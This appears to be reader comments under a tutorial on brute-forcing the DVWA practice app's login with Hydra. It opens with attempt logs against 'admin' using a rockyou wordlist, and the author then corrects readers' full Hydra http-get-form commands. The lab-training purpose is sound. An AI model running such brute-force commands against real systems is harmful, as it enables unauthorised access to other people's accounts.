[ATTEMPT] target 192.168.2.116 – login “admin” – pass “princess” – 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “1234567” – 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “rockyou” – 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345678” – 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “abc123” – 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “nicole” – 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “daniel” – 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “babygirl” – 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “monkey” – 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “lovely” – 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “jessica” – 16 of 14344399 [child 15] (0/0)
[STATUS] 16.00 tries/min, 16 tries in 00:01h, 14344383 to do in 14942:04h, 16 active
[STATUS] 5.33 tries/min, 16 tries in 00:03h, 14344383 to do in 44826:12h, 16 active
…
Hi Tom
Thanks for your comment. Getting the syntax correct on this can be a right pain.
Try swapping the security and PHPSESSID around...
Your command:
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb
Try this:
‘/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb; security=low‘
Make sure you keep an eye on the spaces between PHPSESSID and security.
Let me know how you get on.
Hemp
Hi there,
I am doing the same thing as you have mentioned, as the brute force part of my ethical hacking project. But my result is not appearing; it keeps on showing the status and tries and nothing happens. Could you please help?
I am struggling with this issue.
Hi Ambreen
Could you please paste the command you are using in the comments?
I can then take a look and hopefully work out what the issue is.
Hemp
Thanks for your reply. The problem has been resolved now. Hydra 9.1 is buggy; I have upgraded it to 9.2, and it is all working now.
Hi, could you please help?
hydra 127.0.0.1 -V -l admin -P ‘Quickpasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/?username=USER&password=PASS&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSEED=etl6p7687vhql1ssfnmmpcdk80;security=low”
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-23 10:55:50
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: F=Username and/or password incorrect.
I got this error at security level = low. Please help.
Hi Priya
The http-get-form syntax is very unforgiving; however, the error message is stating that you have not added the ^USER^ and ^PASS^ tags to your command. See my example below.
hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low"
Also, make sure you keep an eye on the spacing at the end of the command (:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low)
If you have not already, check out my more in-depth tutorial on brute-forcing passwords with hydra here.
Hope this helps; come back and let me know how you get on.
Hemp